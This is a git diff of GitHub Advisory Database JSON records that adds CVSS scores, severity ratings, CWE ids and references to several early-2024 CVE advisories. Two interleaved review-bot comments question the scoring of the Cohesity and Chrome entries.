@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wmpm-9r6p-rpww", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2021-42146" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers allow remote attackers to reuse the same epoch number within two times the TCP maximum segment lifetime, which is prohibited in RFC6347. This vulnerability allows remote attackers to obtain sensitive application (data of connected clients).", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json b/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json index f60ec2c1ad623..3a7cf0b05540d 100644 --- a/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json +++ b/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wpfm-839m-3pxg", - "modified": "2024-01-28T03:30:35Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T03:30:35Z", "aliases": [ "CVE-2024-23741" ], "details": "An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T03:15:08Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json b/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json index 6281b71b71203..bff846dd1196b 100644 --- a/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json +++ b/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wph3-4v72-8x34", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2024-0605" ], "details": "Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-362" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T19:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wx6g-w634-22ph/GHSA-wx6g-w634-22ph.json b/advisories/unreviewed/2024/01/GHSA-wx6g-w634-22ph/GHSA-wx6g-w634-22ph.json new file mode 100644 index 0000000000000..137b5ec195087 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wx6g-w634-22ph/GHSA-wx6g-w634-22ph.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx6g-w634-22ph", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:33Z", + "aliases": [ + "CVE-2024-22646" + ], + "details": "An email address enumeration vulnerability exists in the password reset function of SEO Panel version 4.10.0. This allows an attacker to guess which emails exist on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22646" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22646" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wxxj-43fh-x378/GHSA-wxxj-43fh-x378.json b/advisories/unreviewed/2024/01/GHSA-wxxj-43fh-x378/GHSA-wxxj-43fh-x378.json new file mode 100644 index 0000000000000..73784411d6726 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wxxj-43fh-x378/GHSA-wxxj-43fh-x378.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxxj-43fh-x378", + "modified": "2024-01-29T15:30:30Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2024-1005" + ], + "details": "A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1005" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/M9ERphWTXUPj" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252274" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-552" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json b/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json index 0aa97f537d3aa..c51396863928e 100644 --- a/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json +++ b/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x22g-h3w3-4m5v", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-29T21:30:26Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2023-48118" ], "details": "SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-89" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json b/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json index e8264d8e1d714..4c8e1c63f579d 100644 --- a/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json +++ b/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x4g7-cr9m-3wfr", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T21:31:02Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-35836" ], "details": "An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target's Wi-Fi networks.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T23:15:08Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json b/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json index d06bc75ce9afb..808fd3ed6d7aa 100644 --- a/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json +++ b/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0553" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0533" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0627" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0553" @@ -33,10 +41,18 @@ "type": "WEB", "url": "https://gitlab.com/gnutls/gnutls/-/issues/1522" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/" + }, { "type": "WEB", "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0011/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/3" diff --git a/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json b/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json index 5991a167f2198..d75a1e7123377 100644 --- a/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json +++ b/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x73f-6qwm-hh3x", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0748" ], "details": "A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json b/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json index 1fdf8077d2cb5..ddc7e04ae9356 100644 --- a/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json +++ b/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x77j-46hj-595v", - "modified": "2024-01-19T21:30:35Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-19T21:30:35Z", "aliases": [ "CVE-2023-33295" ], "details": "Cohesity DataProtect 6.8.1 and 6.6.0d was discovered to have a incorrect access control vulnerability due to a lack of TLS Certificate Validation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T20:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json b/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json index 0b229cc835cdd..5ca6dbcac48b9 100644 
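Review bot: In the GHSA-x77j-46hj-595v hunk the new vector scores a missing TLS certificate validation as `AV:N/AC:L`, although CVSS 3.1 treats an attacker who has to sit in the network path (the man-in-the-middle this flaw enables) as high attack complexity, and the SpliceCom certificate entry later in this same diff is scored `AC:H/UI:R` for the equivalent eavesdropping scenario. The record is `"github_reviewed": false`, so the vector is presumably mirrored from NVD rather than assessed here; it is worth flagging for the reviewed pass instead of being consumed as a settled MODERATE. The `cwe_ids` array is also left empty even though the details name the weakness outright; `"cwe_ids": ["CWE-295"]` would match the tag this diff applies to the SpliceCom certificate issue, provided the NVD record agrees.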
--- a/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json +++ b/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x83f-9m8f-428q", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0808" ], "details": "Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x8fv-5w4j-wcrj/GHSA-x8fv-5w4j-wcrj.json b/advisories/unreviewed/2024/01/GHSA-x8fv-5w4j-wcrj/GHSA-x8fv-5w4j-wcrj.json new file mode 100644 index 0000000000000..0eaa430106204 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-x8fv-5w4j-wcrj/GHSA-x8fv-5w4j-wcrj.json 
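Review bot: In the GHSA-x83f-9m8f-428q hunks the details text itself carries Chromium's own rating, `(Chromium security severity: High)`, while the added vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` and the derived `"severity": "CRITICAL"` say otherwise, so the two severities on the same record disagree. The description also says exploitation is `via a malicious file`, which normally implies a victim must open or load something (`UI:R`), not the `UI:N` the vector records; that lowers the base score below the critical band. Both values come from NVD for an unreviewed entry, so the fix is a review flag rather than a hand edit, but downstream consumers that filter on `database_specific.severity` will see CRITICAL for a bug the vendor rates High.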
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x8fv-5w4j-wcrj", + "modified": "2024-01-30T03:30:30Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-1027" + ], + "details": "A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1027" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252300" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252300" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json b/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json index ce10beb68d91a..c42946aec1793 100644 --- a/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json +++ b/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x8jc-9x8v-27f5", - "modified": "2024-01-26T18:30:34Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T03:31:07Z", "aliases": [ "CVE-2023-42935" ], "details": "An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x9cm-jx7h-mxw7/GHSA-x9cm-jx7h-mxw7.json b/advisories/unreviewed/2024/01/GHSA-x9cm-jx7h-mxw7/GHSA-x9cm-jx7h-mxw7.json new file mode 100644 index 0000000000000..75727ed7d703d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-x9cm-jx7h-mxw7/GHSA-x9cm-jx7h-mxw7.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x9cm-jx7h-mxw7", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22306" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hometory Mang Board WP allows Stored XSS.This issue affects Mang Board WP: from n/a through 1.7.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22306" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/mangboard/wordpress-mang-board-wp-plugin-1-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json b/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json index a805aac9c307b..c4c75f641541e 100644 --- a/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json +++ b/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xc7v-9m4q-8q68", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:29Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2024-22720" ], "details": "Kanboard 1.2.34 is vulnerable to Html Injection in the group management feature.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json b/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json index 33df53220b031..5962d3f241241 100644 --- a/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json +++ b/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xcjc-c88c-v52w", - "modified": "2024-01-22T15:30:23Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-22T15:30:23Z", "aliases": [ "CVE-2020-36772" ], "details": "CloudLinux\n CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to\n the sendmail proxy command. This allows local users to read and write \narbitrary files outside the CageFS environment in a limited way.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -33,9 +36,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-610", "CWE-73" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T15:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xf98-9fph-7hjg/GHSA-xf98-9fph-7hjg.json b/advisories/unreviewed/2024/01/GHSA-xf98-9fph-7hjg/GHSA-xf98-9fph-7hjg.json new file mode 100644 index 0000000000000..d9c51cfb4f8c2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xf98-9fph-7hjg/GHSA-xf98-9fph-7hjg.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf98-9fph-7hjg", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:33Z", + "aliases": [ + "CVE-2024-22643" + ], + "details": "A Cross-Site Request Forgery (CSRF) vulnerability in SEO Panel version 4.10.0 allows remote attackers to perform unauthorized user password resets.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22643" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22643" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json b/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json index 058b8b3540c74..7253f037771f4 100644 --- a/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json +++ b/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xgfc-fhgr-xpj4", - "modified": "2024-01-26T15:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-26T15:30:32Z", "aliases": [ "CVE-2024-22551" ], "details": "WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T15:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xh95-48w4-456m/GHSA-xh95-48w4-456m.json b/advisories/unreviewed/2024/01/GHSA-xh95-48w4-456m/GHSA-xh95-48w4-456m.json new file mode 100644 index 0000000000000..442ef3039e2d0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xh95-48w4-456m/GHSA-xh95-48w4-456m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xh95-48w4-456m", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2024-0589" + ], + "details": "Cross-site scripting (XSS) vulnerability in the entry overview tab in Devolutions Remote Desktop Manager 2023.3.36 and earlier on Windows allows an attacker with access to a data source to inject a malicious script via a specially crafted input in an entry.\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0589" + }, + { + "type": "WEB", + "url": "https://devolutions.net/security/advisories/DEVO-2024-0001/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json b/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json index c10052f8bea99..0b7559b4c88c7 100644 --- a/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json +++ b/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xm3m-3r5x-p3p6", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-0703" @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-xpxv-cx25-38p3/GHSA-xpxv-cx25-38p3.json b/advisories/unreviewed/2024/01/GHSA-xpxv-cx25-38p3/GHSA-xpxv-cx25-38p3.json new file mode 100644 index 0000000000000..58fb658ee1b96 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xpxv-cx25-38p3/GHSA-xpxv-cx25-38p3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpxv-cx25-38p3", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-31T00:30:17Z", + "aliases": [ + "CVE-2023-51204" + ], + "details": "Insecure deserialization in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to execute arbitrary code via a crafted input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51204" + }, + { + "type": "WEB", + "url": "https://github.com/16yashpatel/CVE-2023-51204" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xq4v-69gf-r78f/GHSA-xq4v-69gf-r78f.json b/advisories/unreviewed/2024/01/GHSA-xq4v-69gf-r78f/GHSA-xq4v-69gf-r78f.json new file mode 100644 index 0000000000000..56ed826570cde --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xq4v-69gf-r78f/GHSA-xq4v-69gf-r78f.json 
